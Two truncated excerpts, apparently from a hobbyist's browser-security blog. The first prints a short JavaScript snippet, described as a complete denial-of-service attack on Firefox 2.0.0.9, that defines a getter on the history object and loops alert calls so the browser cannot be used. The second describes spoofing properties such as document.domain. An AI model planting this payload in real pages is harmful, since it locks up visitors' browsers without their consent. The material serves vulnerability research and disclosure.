Here’s a complete DOS attack on Firefox using the history object:- window.onload = function() { history.__defineGetter__(“x”, function() { for(i in this) { try { alert(this[i]); } catch(e) { } } }); history.x; } Tested on Firefox 2.0.0.9 mac, a window pops up with two blank buttons and you are unable to do anything without using […]

I’ve been hacking Firefox in my spare time and I thought that it had adequate protection against spoofing properties like document.domain. I was wrong 🙂 This could turn into a browser exploit in future if the spoofed objects are accepted by Firefox internally (I don’t think they are, but you never know 😉 ). There […]